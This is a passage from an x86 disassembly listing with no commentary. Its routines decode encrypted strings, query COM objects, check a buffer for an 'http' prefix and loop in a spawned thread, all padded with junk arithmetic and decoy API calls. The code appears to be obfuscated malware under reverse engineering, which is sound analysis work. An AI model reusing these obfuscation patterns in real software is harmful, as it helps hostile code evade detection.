mov [ebp+var_52658], edi
call sub_40C598 ; GetTickCount
mov eax, [ebp+var_5261C]
mov ds:dword_42EB94, eax
lea eax, [ebp+var_525FE]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
or ebx, ebx
jnz loc_407F0E
cmp [ebp+var_525FE], 0
jz short loc_407028
mov ax, word_4413A5
mov [ebp+var_5265A], ax
jmp loc_407F0E
; ---------------------------------------------------------------------------
loc_407028: ; CODE XREF: sub_406E2B+1E9�j
lea edi, [ebp+var_52661]
lea esi, aJXe? ; "J$xE+?"
mov ecx, 7
rep movsb
mov ax, word_4413AE
mov [ebp+var_52663], ax
lea edi, [ebp+var_52666]
lea esi, byte_4413B0
mov ecx, 3
rep movsb
mov [ebp+var_10001], 0
mov [ebp+var_2], 0
lea eax, [ebp+var_52604]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
lea edi, [ebp+var_52667]
lea esi, byte_4413B3
xor ecx, ecx
inc ecx
rep movsb
or ebx, ebx
jnz loc_407F0E
lea eax, [ebp+var_52640]
push eax
mov eax, [ebp+var_52604]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C5A4 ; GetVersion
or ebx, ebx
jnz loc_407EF4
mov [ebp+var_52606], 281Eh
movzx eax, [ebp+var_52606]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52606], ax
or [ebp+var_524CC], 0FFFFFFFFh
loc_4070DC: ; CODE XREF: sub_406E2B+B65�j
and [ebp+var_5260C], 0
and [ebp+var_52614], 0
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_407133
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov [ebp+var_52684], 638Dh
add [ebp+var_52684], 5FB7h
or ebx, ebx
jnz loc_407979
call sub_40C514 ; GetCurrentThreadId
jmp loc_40724E
; ---------------------------------------------------------------------------
loc_407133: ; CODE XREF: sub_406E2B+2C6�j
lea edi, [ebp+var_52696]
lea esi, a9ebg ; "9EB#"
mov ecx, 3
rep movsw
mov [ebp+var_52690], 17h
mov eax, [ebp+var_524CC]
mov [ebp+var_52688], eax
lea eax, [ebp+var_526A8]
push eax
lea eax, [ebp+var_52690]
push eax
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_5260C]
push eax
push offset dword_446BD4
mov eax, [ebp+var_526A0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C598 ; GetTickCount
or ebx, ebx
jnz loc_407979
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_52614]
push eax
mov eax, [ebp+var_5260C]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
or ebx, ebx
jz short loc_4071E9
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea edi, [ebp+var_526AA]
lea esi, byte_4413BA
xor ecx, ecx
inc ecx
rep movsb
jmp loc_407979
; ---------------------------------------------------------------------------
loc_4071E9: ; CODE XREF: sub_406E2B+395�j
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_52614]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
lea edi, [ebp+var_526A9]
lea esi, byte_4413BB
xor ecx, ecx
inc ecx
rep movsb
or ebx, ebx
jz short loc_40724E
lea edi, [ebp+var_526B8]
lea esi, a854 ; "^85/4=|"
movsd
movsd
mov eax, [ebp+var_52614]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_526B0], 97Dh
inc [ebp+var_526B0]
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_407979
; ---------------------------------------------------------------------------
loc_40724E: ; CODE XREF: sub_406E2B+303�j
; sub_406E2B+3E6�j
lea eax, [ebp+var_525EC]
push eax
mov eax, [ebp+var_525E4]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
or ebx, ebx
jnz loc_407E8E
and [ebp+var_21784], 0
jmp loc_407967
; ---------------------------------------------------------------------------
loc_407277: ; CODE XREF: sub_406E2B+B48�j
mov [ebp+var_627C0], 0B8h
add [ebp+var_627C0], 1
push 0
call sub_40C9B8
pop ecx
call sub_40C5A4 ; GetVersion
mov [ebp+var_626B8], 2
mov eax, [ebp+var_21784]
mov [ebp+var_626B0], eax
lea eax, [ebp+var_626A4]
push eax
lea esi, [ebp+var_626B8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_626B8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_525E4]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov ax, word_4413C4
mov [ebp+var_627CC], ax
or ebx, ebx
jnz loc_407961
call sub_40C508 ; GetCurrentProcessId
and [ebp+var_626BC], 0
lea eax, [ebp+var_626BC]
push eax
push offset dword_446BB4
mov eax, [ebp+var_626A4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C634 ; IsDebuggerPresent
or ebx, ebx
jnz loc_407683
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebp+var_626C0]
push eax
mov eax, [ebp+var_626BC]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
mov [ebp+var_627C2], 7A7Ch
movzx eax, [ebp+var_627C2]
imul eax, 2CBEh
mov [ebp+var_627C2], ax
or ebx, ebx
jnz loc_407683
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebp+var_62687]
push eax
push [ebp+var_626C0]
call sub_40692E
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_6269C], edi
lea edi, [ebp+var_627D3]
lea esi, aWUn@ ; " w*UN@"
mov ecx, 7
rep movsb
and [ebp+var_52684], 0
jmp short loc_4073D6
; ---------------------------------------------------------------------------
loc_4073AD: ; CODE XREF: sub_406E2B+5B7�j
mov eax, [ebp+var_52684]
mov al, [ebp+eax+var_62687]
cmp al, 0Dh
jz short loc_4073C2
cmp al, 0Ah
jnz short loc_4073D0
loc_4073C2: ; CODE XREF: sub_406E2B+591�j
mov eax, [ebp+var_52684]
mov [ebp+eax+var_62687], 0
loc_4073D0: ; CODE XREF: sub_406E2B+595�j
inc [ebp+var_52684]
loc_4073D6: ; CODE XREF: sub_406E2B+580�j
mov eax, [ebp+var_6269C]
cmp [ebp+var_52684], eax
jb short loc_4073AD
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_407441
mov [ebp+var_627E0], 1CC7h
movzx eax, [ebp+var_627E0]
imul eax, 5DEDh
mov [ebp+var_627E0], ax
push 11h
push offset aAmdgKLvA ; "Ń ¬¤£½ŖĄ«¢æ ²ČµÓĶ"
call sub_406D88
push [ebp+var_21784]
push eax
lea edi, [ebp+var_627BF]
push edi
call sub_40CA30
lea eax, [ebp+var_627BF]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CA54
add esp, 1Ch
jmp short loc_4074AB
; ---------------------------------------------------------------------------
loc_407441: ; CODE XREF: sub_406E2B+5C0�j
mov ax, word_4413CD
mov word ptr [ebp+var_627E4], ax
push 13h
push offset aLMaiLvA ; "Ń«æ¬ Ø²ČµĄ«¢æ ²ČµÓĶ"
call sub_406D88
push [ebp+var_21784]
push [ebp+var_524CC]
push eax
lea edi, [ebp+var_627BF]
push edi
call sub_40CA30
mov [ebp+var_627E0], 4C50h
add [ebp+var_627E0], 6D23h
lea eax, [ebp+var_627BF]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CA54
add esp, 20h
mov word ptr [ebp+var_627E4+2], 322Ah
inc word ptr [ebp+var_627E4+2]
loc_4074AB: ; CODE XREF: sub_406E2B+614�j
and [ebp+var_52684], 0
loc_4074B2: ; CODE XREF: sub_406E2B+76B�j
mov eax, [ebp+var_52684]
lea ecx, [ebp+eax+var_62687]
or eax, 0FFFFFFFFh
loc_4074C2: ; CODE XREF: sub_406E2B+69C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4074C2
mov [ebp+var_62690], eax
mov [ebp+var_627C3], 84h
add [ebp+var_627C3], 1
mov eax, [ebp+var_62690]
cmp eax, 0
jz short loc_4074EF
cmp eax, 0C8h
jbe short loc_4074F4
loc_4074EF: ; CODE XREF: sub_406E2B+6BB�j
jmp loc_40757D
; ---------------------------------------------------------------------------
loc_4074F4: ; CODE XREF: sub_406E2B+6C2�j
lea edi, [ebp+var_627DA]
lea esi, aGAkux ; ";AKuX"
mov ecx, 7
rep movsb
cmp [ebp+var_62690], 1
jnz short loc_407520
mov eax, [ebp+var_52684]
cmp [ebp+eax+var_62687], 20h
jz short loc_40757D
loc_407520: ; CODE XREF: sub_406E2B+6E3�j
call sub_40C598 ; GetTickCount
push 1
push offset aS_0 ; ""
call sub_406D88
push eax
lea edi, [ebp+var_10001]
push edi
call sub_40CA54
mov [ebp+var_627C4], 0A6h
add [ebp+var_627C4], 0B3h
mov eax, [ebp+var_52684]
lea eax, [ebp+eax+var_62687]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CA54
add esp, 18h
mov [ebp+var_627C8], 61DCh
sub [ebp+var_627C8], 2883h
loc_40757D: ; CODE XREF: sub_406E2B:loc_4074EF�j
; sub_406E2B+6F3�j
mov eax, [ebp+var_62690]
inc eax
add [ebp+var_52684], eax
mov eax, [ebp+var_6269C]
cmp [ebp+var_52684], eax
jb loc_4074B2
and [ebp+var_62698], 0
lea ecx, [ebp+var_10001]
or eax, 0FFFFFFFFh
loc_4075AC: ; CODE XREF: sub_406E2B+786�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4075AC
mov [ebp+var_62690], eax
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_52684], 0
jmp loc_407663
; ---------------------------------------------------------------------------
loc_4075CD: ; CODE XREF: sub_406E2B+844�j
lea edi, [ebp+var_627E4+1]
lea esi, aEW ; " E~^W"
mov ecx, 3
rep movsw
mov eax, [ebp+var_52684]
cmp [ebp+eax+var_10001], 20h
jz short loc_4075F8
and [ebp+var_6268C], 0
loc_4075F8: ; CODE XREF: sub_406E2B+7C4�j
call sub_40C508 ; GetCurrentProcessId
cmp [ebp+var_6268C], 0
jnz short loc_407630
call sub_40C5A4 ; GetVersion
mov eax, [ebp+var_62698]
mov edx, [ebp+var_52684]
mov dl, [ebp+edx+var_10001]
mov [ebp+eax+var_10001], dl
call sub_40C508 ; GetCurrentProcessId
inc [ebp+var_62698]
loc_407630: ; CODE XREF: sub_406E2B+7D9�j
mov eax, [ebp+var_52684]
cmp [ebp+eax+var_10001], 20h
jnz short loc_40764A
mov [ebp+var_6268C], 1
loc_40764A: ; CODE XREF: sub_406E2B+813�j
lea edi, [ebp+var_627E8]
lea esi, aUD ; "u;D "
mov ecx, 5
rep movsb
inc [ebp+var_52684]
loc_407663: ; CODE XREF: sub_406E2B+79D�j
mov eax, [ebp+var_62690]
cmp [ebp+var_52684], eax
jb loc_4075CD
mov eax, [ebp+var_62698]
mov [ebp+eax+var_10001], 0
loc_407683: ; CODE XREF: sub_406E2B+4FB�j
; sub_406E2B+53D�j
and [ebp+var_62694], 0
lea eax, [ebp+var_62694]
push eax
push offset dword_446BC4
mov eax, [ebp+var_626A4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_407947
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_626A0]
push eax
mov eax, [ebp+var_62694]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
call sub_40C508 ; GetCurrentProcessId
or ebx, ebx
jnz loc_40792D
lea edi, [ebp+var_627DD]
lea esi, asc_4413E1 ; "=="
mov ecx, 3
rep movsb
and [ebp+var_52688], 0
jmp loc_407909
; ---------------------------------------------------------------------------
loc_4076F6: ; CODE XREF: sub_406E2B+AEA�j
call sub_40C514 ; GetCurrentThreadId
push 0
call sub_40C9B8
pop ecx
call sub_40C5A4 ; GetVersion
mov [ebp+var_627F8], 2
mov eax, [ebp+var_52688]
mov [ebp+var_627F0], eax
lea eax, [ebp+var_627E8]
push eax
lea esi, [ebp+var_627F8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_627F8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_62694]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
or ebx, ebx
jnz loc_407903
mov [ebp+var_6280D], 0Fh
add [ebp+var_6280D], 1
and [ebp+var_627E4], 0
lea eax, [ebp+var_627E4]
push eax
push offset dword_446BB4
mov eax, [ebp+var_627E8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_4078C6
lea edi, [ebp+var_62813]
lea esi, aT6rr ; "T6Rr"
mov ecx, 5
rep movsb
cmp [ebp+var_627E4], 0
jz loc_4078C6
mov [ebp+var_6280E], 85h
add [ebp+var_6280E], 1
lea eax, [ebp+var_62808]
push eax
push 0
push [ebp+var_10FA8]
mov eax, [ebp+var_627E4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_4413E9
mov [ebp+var_62818+1], eax
or ebx, ebx
jnz loc_4078C6
call sub_40C514 ; GetCurrentThreadId
cmp [ebp+var_62808], 8
jnz loc_4078C6
call sub_40C514 ; GetCurrentThreadId
movzx edi, [ebp+var_2]
mov esi, [ebp+var_627E4]
mov [ebp+edi*4+var_10FA4], esi
movzx edi, [ebp+var_2]
mov esi, [ebp+var_52688]
mov [ebp+edi*2+var_1177C], si
lea eax, [ebp+var_62808]
push eax
push 0
push [ebp+var_10FAC]
mov eax, [ebp+var_627E4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_4078C2
call sub_40C538 ; RtlGetLastWin32Error
lea edi, [ebp+var_63822]
lea esi, aFA ; ",F`>a"
mov ecx, 3
rep movsw
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_63816]
push eax
push [ebp+var_62800]
call sub_40692E
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_6381C], edi
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+var_63816], 0
jz short loc_4078BD
cmp edi, 64h
jnb short loc_4078BD
lea eax, [ebp+var_63816]
push eax
movzx eax, [ebp+var_2]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
call sub_40C4B8
loc_4078BD: ; CODE XREF: sub_406E2B+A70�j
; sub_406E2B+A75�j
call sub_40C634 ; IsDebuggerPresent
loc_4078C2: ; CODE XREF: sub_406E2B+A26�j
inc [ebp+var_2]
loc_4078C6: ; CODE XREF: sub_406E2B+968�j
; sub_406E2B+988�j ...
cmp [ebp+var_627E4], 0
jz short $+2
call sub_40C514 ; GetCurrentThreadId
cmp [ebp+var_627E8], 0
jz short loc_4078E9
mov eax, [ebp+var_627E8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4078E9: ; CODE XREF: sub_406E2B+AB0�j
mov [ebp+var_6280C], 6832h
mov eax, [ebp+var_6280C]
mov edx, eax
add edx, eax
mov [ebp+var_6280C], edx
loc_407903: ; CODE XREF: sub_406E2B+92D�j
inc [ebp+var_52688]
loc_407909: ; CODE XREF: sub_406E2B+8C6�j
mov eax, [ebp+var_626A0]
cmp [ebp+var_52688], eax
jb loc_4076F6
jmp short loc_407961
; ---------------------------------------------------------------------------
mov [ebp+var_627CA], 3C6Eh
inc [ebp+var_627CA]
loc_40792D: ; CODE XREF: sub_406E2B+8A6�j
cmp [ebp+var_62694], 0
jz short loc_407942
mov eax, [ebp+var_62694]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407942: ; CODE XREF: sub_406E2B+B09�j
call sub_40C634 ; IsDebuggerPresent
loc_407947: ; CODE XREF: sub_406E2B+87F�j
cmp [ebp+var_626A4], 0
jz short loc_40795C
mov eax, [ebp+var_626A4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_40795C: ; CODE XREF: sub_406E2B+B23�j
call sub_40C514 ; GetCurrentThreadId
loc_407961: ; CODE XREF: sub_406E2B+4C4�j
; sub_406E2B+AF0�j
inc [ebp+var_21784]
loc_407967: ; CODE XREF: sub_406E2B+447�j
mov eax, [ebp+var_525EC]
cmp [ebp+var_21784], eax
jb loc_407277
loc_407979: ; CODE XREF: sub_406E2B+2F8�j
; sub_406E2B+370�j ...
call sub_40C508 ; GetCurrentProcessId
inc [ebp+var_524CC]
mov eax, [ebp+var_52640]
cmp [ebp+var_524CC], eax
jl loc_4070DC
lea edi, [ebp+var_52668]
lea esi, byte_4413F3
xor ecx, ecx
inc ecx
rep movsb
loc_4079A7: ; CODE XREF: sub_406E2B+CB6�j
push 0
call sub_40C9B8
pop ecx
call sub_40C5A4 ; GetVersion
mov [ebp+var_21786], 0
jmp loc_407A91
; ---------------------------------------------------------------------------
loc_4079C2: ; CODE XREF: sub_406E2B+C73�j
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_524E0]
push eax
push 0
push [ebp+var_10FA8]
movzx edi, [ebp+var_21786]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
lea edi, [ebp+var_62690+1]
lea esi, aBmiJ ; "MI ~j"
mov ecx, 7
rep movsb
or ebx, ebx
jnz loc_407A8A
lea edi, [ebp+var_62698+2]
lea esi, aVsbag0 ; "SAg0"
mov ecx, 7
rep movsb
lea eax, [ebp+var_6267F]
push eax
push [ebp+var_524D8]
call sub_40692E
add esp, 8
mov edi, eax
inc edi
mov [ebp-62688h], edi
call sub_40C574 ; GetProcessHeap
cmp [ebp+var_6267F], 0
jz short loc_407A8A
mov [ebp+var_62682], 4C04h
movzx eax, [ebp+var_62682]
imul eax, 0D94h
mov [ebp+var_62682], ax
cmp dword ptr [ebp-62688h], 64h
jnb short loc_407A8A
lea eax, [ebp+var_6267F]
push eax
movzx eax, [ebp+var_21786]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
call sub_40C4B8
loc_407A8A: ; CODE XREF: sub_406E2B+BD6�j
; sub_406E2B+C19�j ...
inc [ebp+var_21786]
loc_407A91: ; CODE XREF: sub_406E2B+B92�j
movzx eax, [ebp+var_21786]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_4079C2
lea eax, [ebp+var_525FE]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
mov [ebp+var_52628], 0AD1h
add [ebp+var_52628], 0D59h
or ebx, ebx
jnz loc_407F0E
call sub_40C574 ; GetProcessHeap
cmp [ebp+var_525FE], 0
jz loc_4079A7
lea edi, [ebp+var_52669]
lea esi, byte_441402
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+var_2177D], 0
push offset byte_41EB90
lea eax, [ebp+var_2177D]
push eax
call sub_40C4B8
mov [ebp+var_5260E], 164Dh
movzx eax, [ebp+var_5260E]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5260E], ax
mov [ebp+var_525E8], 1
mov [ebp+var_1177E], 0
jmp loc_407C46
; ---------------------------------------------------------------------------
loc_407B45: ; CODE XREF: sub_406E2B+E28�j
mov word ptr [ebp+var_52684+2], 712h
movzx eax, word ptr [ebp+var_52684+2]
imul eax, 568Ah
mov word ptr [ebp+var_52684+2], ax
movzx eax, [ebp+var_1177E]
imul eax, 64h
cmp [ebp+eax+var_524C8], 0
jz loc_407C3F
mov ax, word_441403
mov word ptr [ebp+var_52688+2], ax
and [ebp+var_525E8], 0
push 4
push offset asc_445FAA ; "Ķȵ×"
call sub_406D88
movzx edi, [ebp+var_1177E]
push edi
push eax
lea edi, [ebp+var_525DF]
push edi
call sub_40CA30
mov eax, dword_441405
mov [ebp-5268Ah], eax
lea eax, [ebp+var_525DF]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CA54
mov word ptr [ebp+var_52684], 0F32h
inc word ptr [ebp+var_52684]
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CA54
call sub_40C598 ; GetTickCount
push 1
push offset asc_445FA8 ; "×"
call sub_406D88
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40CA54
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CA54
add esp, 3Ch
call sub_40C538 ; RtlGetLastWin32Error
loc_407C3F: ; CODE XREF: sub_406E2B+D49�j
inc [ebp+var_1177E]
loc_407C46: ; CODE XREF: sub_406E2B+D15�j
movzx eax, [ebp+var_1177E]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407B45
cmp [ebp+var_525E8], 0
jnz loc_407E8E
call sub_40C634 ; IsDebuggerPresent
push 1
push offset asc_445FA6 ; "Ķ"
call sub_406D88
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40CA54
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebp+var_10001]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CA54
add esp, 18h
cmp ds:byte_41EB90, 68h
jnz short loc_407CC3
cmp ds:byte_41EB91, 74h
jnz short loc_407CC3
cmp ds:byte_41EB92, 74h
jnz short loc_407CC3
cmp ds:byte_41EB93, 70h
jz short loc_407CC8
loc_407CC3: ; CODE XREF: sub_406E2B+E7B�j
; sub_406E2B+E84�j ...
jmp loc_407E43
; ---------------------------------------------------------------------------
loc_407CC8: ; CODE XREF: sub_406E2B+E96�j
lea edi, [ebp+var_5266F]
lea esi, aSHt ; "S ht|"
mov ecx, 3
rep movsw
push 8
push offset aKvvkbi ; "ĆĆ"
call sub_406D88
mov edi, 11h
sub edi, dword_441380
push edi
push eax
push offset byte_41EB90
call sub_401806
add esp, 14h
cmp eax, 0FFFFh
jz short loc_407D3A
push 0Eh
push offset aKvvkbiMiMqi ; "ĆĆ"
call sub_406D88
mov edi, 11h
sub edi, dword_441380
push edi
push eax
push offset byte_41EB90
call sub_401806
add esp, 14h
cmp eax, 0FFFFh
jz loc_407E43
loc_407D3A: ; CODE XREF: sub_406E2B+EDC�j
mov [ebp+var_5262A], 0E36h
movzx eax, [ebp+var_5262A]
imul eax, 5F1Ah
mov [ebp+var_5262A], ax
mov [ebp+var_525EE], 0
loc_407D60: ; CODE XREF: sub_406E2B+FE4�j
mov eax, 11h
sub eax, dword_441380
push eax
movzx eax, [ebp+var_525EE]
lea eax, ds:44138Ch[eax]
push eax
push offset byte_41EB90
call sub_401806
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_407DBC
call sub_40C574 ; GetProcessHeap
push 1
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F270
mov [ebp+var_52684], 5D23h
sub [ebp+var_52684], 3A68h
jmp loc_407E43
; ---------------------------------------------------------------------------
loc_407DBC: ; CODE XREF: sub_406E2B+F62�j
movzx eax, [ebp+var_525EE]
mov [ebp+var_52684], eax
lea ecx, ds:44138Ch[eax]
or eax, 0FFFFFFFFh
loc_407DD3: ; CODE XREF: sub_406E2B+FAD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407DD3
mov esi, [ebp+var_52684]
add esi, eax
mov edi, esi
mov [ebp+var_525EE], di
mov [ebp+var_5262B], 0EFh
add [ebp+var_5262B], 52h
inc [ebp+var_525EE]
movzx eax, [ebp+var_525EE]
cmp byte_44138C[eax], 0
jnz loc_407D60
call sub_40C5A4 ; GetVersion
push 0
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F270
mov [ebp+var_5260F], 20h
movzx eax, [ebp+var_5260F]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5260F], al
loc_407E43: ; CODE XREF: sub_406E2B:loc_407CC3�j
; sub_406E2B+F09�j ...
mov [ebp+var_21788], 0
jmp short loc_407E7A
; ---------------------------------------------------------------------------
loc_407E4E: ; CODE XREF: sub_406E2B+105C�j
movzx edi, [ebp+var_21788]
cmp [ebp+edi*4+var_10FA4], 0
jz short loc_407E73
movzx edi, [ebp+var_21788]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+8]
loc_407E73: ; CODE XREF: sub_406E2B+1032�j
inc [ebp+var_21788]
loc_407E7A: ; CODE XREF: sub_406E2B+1021�j
movzx eax, [ebp+var_21788]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_407E4E
call sub_40C574 ; GetProcessHeap
loc_407E8E: ; CODE XREF: sub_406E2B+43A�j
; sub_406E2B+E35�j
cmp [ebp+var_525E4], 0
jz short loc_407EA3
mov eax, [ebp+var_525E4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EA3: ; CODE XREF: sub_406E2B+106A�j
lea edi, [ebp+var_52674]
lea esi, aWG ; "W ^"
mov ecx, 5
rep movsb
cmp [ebp+var_52614], 0
jz short loc_407ECB
mov eax, [ebp+var_52614]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407ECB: ; CODE XREF: sub_406E2B+1092�j
lea edi, [ebp+var_5267A]
lea esi, aDXN ; "d:x`n"
mov ecx, 3
rep movsw
cmp [ebp+var_5260C], 0
jz short loc_407EF4
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EF4: ; CODE XREF: sub_406E2B+287�j
; sub_406E2B+10BB�j
cmp [ebp+var_52604], 0
jz short loc_407F09
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F09: ; CODE XREF: sub_406E2B+10D0�j
call sub_40C538 ; RtlGetLastWin32Error
loc_407F0E: ; CODE XREF: sub_406E2B+176�j
; sub_406E2B+1DB�j ...
cmp [ebp+var_525F8], 0
jz short loc_407F23
mov eax, [ebp+var_525F8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F23: ; CODE XREF: sub_406E2B+10EA�j
mov [ebp+var_52630], 52EFh
mov eax, 3A5Eh
mul [ebp+var_52630]
mov [ebp+var_52688], eax
mov [ebp+var_52630], eax
loc_407F44: ; CODE XREF: sub_406E2B+155�j
cmp [ebp+var_525F4], 0
jz loc_406E95
mov eax, [ebp+var_525F4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_406E95
; ---------------------------------------------------------------------------
loc_407F62: ; CODE XREF: sub_406E2B+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_406E2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F67 proc near ; DATA XREF: sub_40801C+2F�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset word_44141A
push offset sub_40109A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call sub_40C5A4 ; GetVersion
mov [ebp+var_4], 0
call sub_40C538 ; RtlGetLastWin32Error
loc_407F9E: ; CODE XREF: sub_407F67+7A�j
; sub_407F67+9A�j
call sub_40C634 ; IsDebuggerPresent
mov edi, dword_44137C
add edi, 1F3h
push edi
call sub_40C9B8
add esp, 4
call sub_40C5A4 ; GetVersion
call sub_406E2B
mov [ebp+var_1C], 6E5Bh
mov eax, 6540h
mul [ebp+var_1C]
mov [ebp+var_20], eax
mov edi, [ebp+var_20]
mov [ebp+var_1C], edi
cmp dword_441388, 0
jnz short loc_407F9E
jmp short loc_40800A
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_40800A
; ---------------------------------------------------------------------------
mov [ebp+var_1C], 1
mov eax, [ebp+var_1C]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
call sub_40C5A4 ; GetVersion
jmp short loc_407F9E
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
loc_40800A: ; CODE XREF: sub_407F67+7C�j
; sub_407F67+85�j
pop edi
pop esi
pop ebx
xchg eax, ecx
mov eax, [ebp+var_10]
mov large fs:0, eax
xchg eax, ecx
leave
retn 4
sub_407F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40801C proc near ; CODE XREF: sub_40A766+7F2�p
var_9 = byte ptr -9
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
lea edi, [ebp+var_9]
lea esi, aB2U ; "2 U "
mov ecx, 7
rep movsb
mov eax, [ebp+arg_0]
mov ds:dword_40F270, eax
call sub_40C598 ; GetTickCount
push offset dword_441388
push 0
push 0
push offset sub_407F67
push 0
push 0
call sub_40C754 ; CreateThread
mov ebx, eax
mov [ebp+var_1], 0EEh
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push ebx
call sub_40C55C ; CloseHandle
mov [ebp+var_2], 5
sub [ebp+var_2], 0F2h
pop edi
pop esi
pop ebx
leave
retn
sub_40801C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push edi
mov edi, 5B3h
inc edi
cmp dword_441354, 0
jnz short loc_408097
xor eax, eax
jmp short loc_4080DD
; ---------------------------------------------------------------------------
